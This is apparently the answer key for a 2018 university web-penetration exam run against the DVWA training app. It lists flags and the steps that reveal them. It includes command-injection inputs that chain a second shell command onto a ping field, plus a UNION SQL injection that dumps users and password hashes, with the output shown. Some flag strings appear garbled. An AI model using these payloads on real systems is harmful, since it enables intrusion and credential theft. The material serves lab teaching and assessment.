Suzhou Vocational University, 2017-2018 academic year, second semester
Exam standard answers and grading criteria
Web Penetration Basics (decentralized exam, Paper A, open-book, computer-based)
Set by: course group
School (department) of the setter: School of Computer Engineering
Class: 16 Network 1

I. Submit flag1 (5 points each, 30 points total; at most 6 flag1 may be submitted)

[Screenshot, view-source of the login page: Password: <input type="submit" value="Login" name="Login">]

[Screenshot, view-source of the Command Injection page: <form name="ping" action="#" method="post">, Enter an IP address:, <input type="submit" name="Submit" value="Submit">]

[Screenshot, view-source: "fflag1 load_up_file9page!"]

[Screenshot, view-source of the User ID form: <input type="submit" name="Submit" value="Submit">]

[Screenshot, brute-force source: else { // Login failed  sleep( 2 );  echo "Username and/or password incorrect."; }  mysql_close();  followed by "/flag1brute_*source"]

[Screenshot, "Command Injection Source" (PHP). Legible fragments: the comments "Remove any of the characters in the array", "Determine OS and execute the ping command" and "Feedback for the end user", the 'Windows NT' check, and the two shell_exec calls. Flag line: "lag: 1(QKeua& soxixu &y8"]

[Screenshot, "SQL Injection (Blind) Source". Legible fragments: // Feedback for end user  echo 'User ID exists in the database.';  else { // Feedback for end user  echo 'User ID is MISSING from the database.';  the comment "The '@' character suppresses errors";  "flag1 so easypage !";  mysql_close();]

II. Submit flag2 (10 points each, 20 points total; at most 2 flag2 may be submitted)

1. flag2 brute

[Screenshot, Vulnerability: Brute Force, Login: Welcome to the password protected area admin ; flag2Ox62727574654O)]

2. flag hello word!

[Screenshot, Vulnerability: Command Injection, Ping a device]
Enter an IP address: &;&type flag2.txt   [Submit]

Pinging 192.168.190.131 with 32 bytes of data:
Reply from 192.168.190.131: bytes=32 TTL=64
Reply from 192.168.190.131: bytes=32 TTL=64
Reply from 192.168.190.131: bytes=32 TTL=64
Reply from 192.168.190.131: bytes=32 TTL=64
Ping statistics for 192.168.190.131:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
ZmxhZ3toZWxsbyB3b3JkIX0=

flag2:1261734558

III. Submit flag3 (15 points each, 30 points total; at most 2 flag3 may be submitted)

1. flag3 DVWAvulnerabmlities

[Screenshot, Vulnerability: Command Injection, Ping a device]
Enter an IP address: 192.168.190.131&;&type .flag3.txt   [Submit]

Pinging 192.168.190.131 with 32 bytes of data:
Reply from 192.168.190.131: bytes=32 time<1ms TTL=64
Reply from 192.168.190.131: bytes=32 time<1ms TTL=64
Reply from 192.168.190.131: bytes=32 time<1ms TTL=64
Reply from 192.168.190.131: bytes=32 time<1ms TTL=64

[Screenshot, intercepting proxy response (render view) for the SQL injection request:]

First name: 1337
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: 1 union select user,password from users
First name: pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: 1 union select user,password from users
First name: smithy
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
ID: 1 union select user,password from users
First name: flag
Surname: flag3:you win

IV. Submit flag4 (20 points each, 20 points total; at most 1 flag4 may be submitted)

1. c:flag4.rar: the archive password is "admin" as ciphertext (MD5-encrypted); once decrypted, the result is flag4 admin.

[Screenshot, Windows Explorer view of c: showing flag4.rar (WinRAR archive) alongside Documents and Settings, Program Files, WINDOWS and installer files]

2. On the system desktop, flag4.rar has the archive password "#3a"; after decryption the plaintext is flag4password.